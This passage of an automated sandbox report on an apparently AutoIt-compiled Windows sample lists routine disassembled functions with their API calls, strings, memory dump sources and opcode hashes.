                                                                                                                    • Part of subcall function 00DFD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DFD1BA
                                                                                                                    • Part of subcall function 00DFD17C: GetStockObject.GDI32(00000011), ref: 00DFD1CE
                                                                                                                    • Part of subcall function 00DFD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DFD1D8
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00E49968
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00E49982
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                  • Opcode ID: 0077d70d5815a8922b339c7466363ac79a9d45f8392b4113bb8068a92411cc28
                                                                                                                  • Instruction ID: 885927ae68461a6dfc56bbd75ffb36d856f7caa491acdfd0b5f0783ac8285019
                                                                                                                  • Opcode Fuzzy Hash: 0077d70d5815a8922b339c7466363ac79a9d45f8392b4113bb8068a92411cc28
                                                                                                                  • Instruction Fuzzy Hash: B211597262020AAFDB04DFB8DC45AEB7BA8FB48354F015618FA56E2251D774E810DB60
                                                                                                                  Function 00E49617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00E49699
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E496A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                  • Opcode ID: 9505c578d59d3664fe5710c2902eae9f83286fafc1e989ed210cb471c79de8cd
                                                                                                                  • Instruction ID: f4dc9893887cd96649b6872625fd89ae5644f8291bdc4afedab058e9e1edfd8f
                                                                                                                  • Opcode Fuzzy Hash: 9505c578d59d3664fe5710c2902eae9f83286fafc1e989ed210cb471c79de8cd
                                                                                                                  • Instruction Fuzzy Hash: CF118C71500208AFEB205F64EC44EEB3B6AEB053B8F526354F965B71E1C771EC509BA0
                                                                                                                  Function 00E25262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E252D5
                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E252F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                  • String ID: 0
                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                  • Opcode ID: 9836cf8cbd17840e209c5149e71319444ee09858ed82c254b23f0bab598936cf
                                                                                                                  • Instruction ID: dc0a744f3172e4011bc0bb91dff16513251f6e268a5aa17fdc4b5cc62066d4f0
                                                                                                                  • Opcode Fuzzy Hash: 9836cf8cbd17840e209c5149e71319444ee09858ed82c254b23f0bab598936cf
                                                                                                                  • Instruction Fuzzy Hash: 2D11D073901734EBDB20DB98EE04B9D77B8AB06798F052025E902B72A4D3B0AD04C7A0
                                                                                                                  Function 00E34D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E34DF5
                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E34E1E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                  • String ID: <local>
                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                  • Opcode ID: 067896ae582458381142537e2047f761ea57d53e1b093ac5154c912d5b9056f3
                                                                                                                  • Instruction ID: e835df009058f67a6869b76ec8106d9f60a1c7258d3e670150f60efbacd558bf
                                                                                                                  • Opcode Fuzzy Hash: 067896ae582458381142537e2047f761ea57d53e1b093ac5154c912d5b9056f3
                                                                                                                  • Instruction Fuzzy Hash: 261191B1505221BADB258B52CC88EEBFFA8FF06759F50911AF50566180D3706944C6E0
                                                                                                                  Function 00E0A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E137A7
                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00E1388E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                  • String ID: (
                                                                                                                  • API String ID: 3761405300-2982846942
                                                                                                                  • Opcode ID: e652d43d73cac06ac6ec0311a594584f4b35f82b7313cd7a4b68f17fff359076
                                                                                                                  • Instruction ID: e95afd7c60f46eaf983ec895d968f7cafa76f1bf1c16cd0ccf7be33d74d242db
                                                                                                                  • Opcode Fuzzy Hash: e652d43d73cac06ac6ec0311a594584f4b35f82b7313cd7a4b68f17fff359076
                                                                                                                  • Instruction Fuzzy Hash: 8121E2B5541304DFDB00DF66E9956413BF4BB4E314F14982AE508BB3A1E3B17A88EB86
                                                                                                                  Function 00E3A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: htonsinet_addr
                                                                                                                  • String ID: 255.255.255.255
                                                                                                                  • API String ID: 3832099526-2422070025
                                                                                                                  • Opcode ID: b4ef295ac682058ddc2897119e60478bdb3767b9bd69283364c7be7757354eff
                                                                                                                  • Instruction ID: ed36b279853b85d53ccbd04bcfa95cca08669a25ea4a6eb5552317b01e6dfa7e
                                                                                                                  • Opcode Fuzzy Hash: b4ef295ac682058ddc2897119e60478bdb3767b9bd69283364c7be7757354eff
                                                                                                                  • Instruction Fuzzy Hash: 0D012634200304ABCB249F68D88EFEDB7A4EF44314F10942AF515B72D1C772E845C752
                                                                                                                  Function 00E1B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E1B7EF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                  • Opcode ID: 053b93bfa86b7ed8d0dd624873906d62f6dae42f2c3c0da1b14c6579e0e4b867
                                                                                                                  • Instruction ID: 38b8350bd74417a89ba200f2bab690f17e58662cd1f8ee6d483a80f1238edccc
                                                                                                                  • Opcode Fuzzy Hash: 053b93bfa86b7ed8d0dd624873906d62f6dae42f2c3c0da1b14c6579e0e4b867
                                                                                                                  • Instruction Fuzzy Hash: F601D472A50114ABCB04FBA8CC529FE33AAFF45354B04161DF462B72D2EBB0594987B0
                                                                                                                  Function 00E1B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E1B6EB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                  • Opcode ID: b1e4bb256f0da5ee2f10f3ae287bd1521054ae9bb05943aa5cda04bb904ad41f
                                                                                                                  • Instruction ID: b61e225d81da6a0b2c716d475794b29fcd939db4ff69ea873969b2955112ecff
                                                                                                                  • Opcode Fuzzy Hash: b1e4bb256f0da5ee2f10f3ae287bd1521054ae9bb05943aa5cda04bb904ad41f
                                                                                                                  • Instruction Fuzzy Hash: 5801A271A41104ABCB05FBA5CD52AFF73A9EF15344F10201DF502B3181EB945E1987B5
                                                                                                                  Function 00E1B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E1B76C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 3850602802-1403004172
                                                                                                                  • Opcode ID: dde6d3e3e8a705c4e0cd3853d9fa369c2b4851fe48cd3a5901c16b2fb018837d
                                                                                                                  • Instruction ID: 9ba2d1e9187c558b9a1db754437a07ef417d4051894b974d897cf1b7b4941d92
                                                                                                                  • Opcode Fuzzy Hash: dde6d3e3e8a705c4e0cd3853d9fa369c2b4851fe48cd3a5901c16b2fb018837d
                                                                                                                  • Instruction Fuzzy Hash: 3001D172A40104BBCB01FBA4CD02EFF73AD9B05344F50211AF502B31D2EBA45E5A87B5
                                                                                                                  Function 00E04D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __calloc_crt
                                                                                                                  • String ID: "
                                                                                                                  • API String ID: 3494438863-357034475
                                                                                                                  • Opcode ID: 56204bc43dc0b428ebb6fa6ecf4cc0a2f90f1038a397b4ff548c18405ebf98b9
                                                                                                                  • Instruction ID: a785bce1599f5db914b68f6c1c08579d1ba8e4cdbc8b839c523a3a529fc64014
                                                                                                                  • Opcode Fuzzy Hash: 56204bc43dc0b428ebb6fa6ecf4cc0a2f90f1038a397b4ff548c18405ebf98b9
                                                                                                                  • Instruction Fuzzy Hash: 04F0C8F12096025EE7149B1EBD41BA66BD4E749724B14112FF304FA1E4E730E8C146A4
                                                                                                                  Function 00E27744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                  • String ID: #32770
                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                  • Opcode ID: aeca91e1196d134b309d4889cffe593f6ee916f31f5cb056fd51fd6c0940e125
                                                                                                                  • Instruction ID: d2eca0e5d02ceea210c5187e4d4cd46fb5649dead7761ce5f8522fea34baba81
                                                                                                                  • Opcode Fuzzy Hash: aeca91e1196d134b309d4889cffe593f6ee916f31f5cb056fd51fd6c0940e125
                                                                                                                  • Instruction Fuzzy Hash: 08E0D877A083292BDB10EAA6EC09ECBFBACEB55764F010056F915F7081D6B0E64587D0
                                                                                                                  Function 00E1A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E1A63F
                                                                                                                    • Part of subcall function 00E013F1: _doexit.LIBCMT ref: 00E013FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message_doexit
                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                  • API String ID: 1993061046-4017498283
                                                                                                                  • Opcode ID: befbfecc449821b64c7cc0e2834a65c94827f4faa4995b57f2286a65377259c0
                                                                                                                  • Instruction ID: e96417389cf18fdd24095f6a1980bc23c9edff73a3a2d7fafa18e9d578f94b07
                                                                                                                  • Opcode Fuzzy Hash: befbfecc449821b64c7cc0e2834a65c94827f4faa4995b57f2286a65377259c0
                                                                                                                  • Instruction Fuzzy Hash: 78D0123138936836D21436A97C17FD975488F15B95F095025FB1CB55C249D6958041F9
                                                                                                                  Function 00E5AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00E5ACC0
                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00E5AEBD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DirectoryFreeLibrarySystem
                                                                                                                  • String ID: WIN_XPe
                                                                                                                  • API String ID: 510247158-3257408948
                                                                                                                  • Opcode ID: 9406e58bae86c256a1580cf037f419e40438a45b5cc658450184a2e4552bc2d5
                                                                                                                  • Instruction ID: 9dea97ecc38c15ec6c09f54b312306ec06961557f5a71e85605f675d430f6cc5
                                                                                                                  • Opcode Fuzzy Hash: 9406e58bae86c256a1580cf037f419e40438a45b5cc658450184a2e4552bc2d5
                                                                                                                  • Instruction Fuzzy Hash: A9E06D70C04109DFCB11DBA9DD449ECF7B8AB48302F189595E622B2260CBB05A88DF32
                                                                                                                  Function 00E486CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E486E2
                                                                                                                  • PostMessageW.USER32(00000000), ref: 00E486E9
                                                                                                                    • Part of subcall function 00E27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E27AD0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
